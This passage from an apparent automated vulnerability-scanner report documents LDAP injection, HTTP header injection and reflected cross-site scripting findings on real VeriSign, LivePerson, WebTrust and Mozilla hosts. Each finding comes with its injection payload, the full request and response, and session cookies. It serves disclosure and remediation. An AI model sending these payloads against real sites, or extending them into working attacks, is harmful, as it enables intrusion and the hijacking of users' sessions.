Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:36:35 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; expires=Sat, 08-Sep-2012 21:36:35 GMT; path=/hc/71097838; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 427

lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

Request 2

GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=120&channel=web&t=*)!(sn=* HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:36:36 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 427

lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

1.12. http://sales.liveperson.net/hc/71097838/ [timeout parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sales.liveperson.net
Path:   /hc/71097838/

Issue detail

The timeout parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the timeout parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=*)(sn=*&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:36:08 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315603887:-1:1315604093:-1:-1; expires=Sat, 08-Sep-2012 21:36:08 GMT; path=/hc/71097838; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 94

lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":""}});

Request 2

GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=*)!(sn=*&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:36:10 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 94

lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":""}});

2. HTTP header injection  previous  next
There are 5 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. https://idprotect.verisign.com/toolbar/activate.v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/activate.v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b75a9%0d%0a75e798ebedb was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /toolbar/b75a9%0d%0a75e798ebedb HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: idprotect.verisign.com
Connection: Keep-Alive

Response

HTTP/1.0 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:54 GMT
Location: https://idprotect.verisign.com/toolbar/b75a9
75e798ebedb
.v
Content-Length: 0
Connection: close
Content-Type: text/plain


2.2. https://idprotect.verisign.com/toolbar/download.v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/download.v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload e39d2%0d%0acc51e9a9020 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /toolbar/e39d2%0d%0acc51e9a9020 HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/home.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:54 GMT
Location: https://idprotect.verisign.com/toolbar/e39d2
cc51e9a9020
.v
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain


2.3. https://idprotect.verisign.com/toolbar/downloadIE.v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/downloadIE.v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b8c36%0d%0ab68ecacc3e6 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /toolbar/b8c36%0d%0ab68ecacc3e6 HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/install.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:48:19 GMT
Location: https://idprotect.verisign.com/toolbar/b8c36
b68ecacc3e6
.v
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain


2.4. https://idprotect.verisign.com/toolbar/home.v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/home.v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 2c8db%0d%0a9a17d95f3a9 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /toolbar/2c8db%0d%0a9a17d95f3a9 HTTP/1.1
Host: idprotect.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:42:10 GMT
Location: https://idprotect.verisign.com/toolbar/2c8db
9a17d95f3a9
.v
Content-Length: 0
Connection: close
Content-Type: text/plain


2.5. https://idprotect.verisign.com/toolbar/install.v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/install.v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 8796f%0d%0aaa90b981baa was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /toolbar/8796f%0d%0aaa90b981baa HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/download.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:55 GMT
Location: https://idprotect.verisign.com/toolbar/8796f
aa90b981baa
.v
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain


3. Cross-site scripting (reflected)  previous  next
There are 35 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. https://cert.webtrust.org/ViewSeal [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cert.webtrust.org
Path:   /ViewSeal

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload e2636<script>alert(1)</script>2536d5d1b26 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ViewSeal?id=304e2636<script>alert(1)</script>2536d5d1b26 HTTP/1.1
Host: cert.webtrust.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 20:14:35 GMT
Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector)
X-Cache: MISS from cert.webtrust.org
Connection: close
Content-Type: text/html
Content-Length: 2976

java.lang.NumberFormatException: For input string: "304e2636<script>alert(1)</script>2536d5d1b26"
   at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48)
   at java.lang.Integer.parseInt(Integer.java:435)
   at java.lang.Integer.parseInt(Integer.java:476)
   at ca.cica.servlet
...[SNIP]...

3.2. http://com-verisign.netmng.com/ [height parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://com-verisign.netmng.com
Path:   /

Issue detail

The value of the height request parameter is copied into the HTML document as plain text between tags. The payload 42f25<script>alert(1)</script>04b6e822761 was submitted in the height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?function=createPopinWindow&name=screen1&width=754&height=42f25<script>alert(1)</script>04b6e822761&rand=0.03673732164315879&nm_input_data=%22%22 HTTP/1.1
Host: com-verisign.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1; evo5_VERISIGN_popin=1; evo5_VERISIGN=xep22ngsyerii%7COWn3FV9W0IGSJLrIppIRrZfSVe1We35EI4V4gBbixt8vL04ZKRREeQ778xI3DBjSo3Pq49K1cfcVvCg7qSIKn44I4XJ6cPR3Yj9Y3%2BMmEuQ5%2FYKzCkMnasBxmIRyKGTNYwlD1dvGPKbFxRFCvXppOCDQTBscyOfjUpXgtoyIAMmYbof2%2FajobILQpOxOi2Hs0x9UdZmRfM%2Fuoq9V0S17NeIqzDx%2BsP4gdfn5KCU%2F47pq%2B7rEF0aHB6ftFm0dez3T

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:39 GMT
Server: Apache/2.2.9
P3P: policyref="http://com-verisign.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Wed, 07 Sep 2011 21:28:39 GMT
Last-Modified: Wed, 07 Sep 2011 21:28:39 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18558

nm_Popin.arrPopinWindow['screen1'].createPopinWindow(754,42f25<script>alert(1)</script>04b6e822761, '<form name=\"screen1\" onsubmit=\"return false;\" method=\"get\"> <input type=\"hidden\" nam
...[SNIP]...

3.3. http://com-verisign.netmng.com/ [width parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://com-verisign.netmng.com
Path:   /

Issue detail

The value of the width request parameter is copied into the HTML document as plain text between tags. The payload ef64f<script>alert(1)</script>1df44e97474 was submitted in the width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?function=createPopinWindow&name=screen1&width=754ef64f<script>alert(1)</script>1df44e97474&height=400&rand=0.03673732164315879&nm_input_data=%22%22 HTTP/1.1
Host: com-verisign.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1; evo5_VERISIGN_popin=1; evo5_VERISIGN=xep22ngsyerii%7COWn3FV9W0IGSJLrIppIRrZfSVe1We35EI4V4gBbixt8vL04ZKRREeQ778xI3DBjSo3Pq49K1cfcVvCg7qSIKn44I4XJ6cPR3Yj9Y3%2BMmEuQ5%2FYKzCkMnasBxmIRyKGTNYwlD1dvGPKbFxRFCvXppOCDQTBscyOfjUpXgtoyIAMmYbof2%2FajobILQpOxOi2Hs0x9UdZmRfM%2Fuoq9V0S17NeIqzDx%2BsP4gdfn5KCU%2F47pq%2B7rEF0aHB6ftFm0dez3T

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:36 GMT
Server: Apache/2.2.9
P3P: policyref="http://com-verisign.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Wed, 07 Sep 2011 21:28:36 GMT
Last-Modified: Wed, 07 Sep 2011 21:28:36 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18562

nm_Popin.arrPopinWindow['screen1'].createPopinWindow(754ef64f<script>alert(1)</script>1df44e97474, 400, '<form name=\"screen1\" onsubmit=\"return false;\" method=\"get\"> <input type=\"hidden\"
...[SNIP]...

3.4. https://donate.mozilla.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://donate.mozilla.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 559c1<script>alert(1)</script>34648dd8ac9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico559c1<script>alert(1)</script>34648dd8ac9 HTTP/1.1
Host: donate.mozilla.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751; X-CheckNode=; X-Mapping-jljaemke=1CFCBA838EC874D34F4F849FD7A403BC

Response

HTTP/1.0 404 Not Found
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 09 Sep 2011 22:14:57 GMT
X-Served-By: moz2
Connection: Keep-Alive
Set-Cookie: X-CheckNode=true; domain=donate.mozilla.org; path=/
Content-Length: 310

<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Sorry, File Not Found: 404</h1>
<p>Invalid URL /favicon.ico559c1<script>alert(1)</script>34648dd8ac9</p><p><a href="http://donate.
...[SNIP]...

3.5. https://donate.mozilla.org/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://donate.mozilla.org
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 29f1f<script>alert(1)</script>971a874b532 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?29f1f<script>alert(1)</script>971a874b532=1 HTTP/1.1
Host: donate.mozilla.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751; X-CheckNode=; X-Mapping-jljaemke=1CFCBA838EC874D34F4F849FD7A403BC

Response

HTTP/1.0 404 Not Found
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 09 Sep 2011 22:14:56 GMT
X-Served-By: moz2
Connection: Keep-Alive
Set-Cookie: X-CheckNode=true; domain=donate.mozilla.org; path=/
Content-Length: 313

<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Sorry, File Not Found: 404</h1>
<p>Invalid URL /favicon.ico?29f1f<script>alert(1)</script>971a874b532=1</p><p><a href="http://dona
...[SNIP]...

3.6. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://donate.mozilla.org
Path:   /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a47c6<script>alert(1)</script>68ca81f006 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page1166c%3Cscript%3Ealert(document.location)%3Ca47c6<script>alert(1)</script>68ca81f006/script%3E98501cf3ded/contribute/openwebfund HTTP/1.1
Host: donate.mozilla.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751

Response

HTTP/1.0 404 Not Found
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 09 Sep 2011 22:14:57 GMT
Connection: Keep-Alive
Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/
Content-Length: 390

<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Sorry, File Not Found: 404</h1>
<p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3Ca47c6<script>alert(1)</script>68ca81f006/script%3E98501cf3ded/contribute/openwebfund</p>
...[SNIP]...

3.7. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://donate.mozilla.org
Path:   /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 809c8<script>alert(1)</script>eb7bb1b1504 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded809c8<script>alert(1)</script>eb7bb1b1504/contribute/openwebfund HTTP/1.1
Host: donate.mozilla.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751

Response

HTTP/1.0 404 Not Found
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 09 Sep 2011 22:14:58 GMT
Connection: Keep-Alive
Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/
Content-Length: 391

<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Sorry, File Not Found: 404</h1>
<p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded809c8<script>alert(1)</script>eb7bb1b1504/contribute/openwebfund</p>
...[SNIP]...

3.8. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://donate.mozilla.org
Path:   /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 91fb8<script>alert(1)</script>7f56fd6704d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

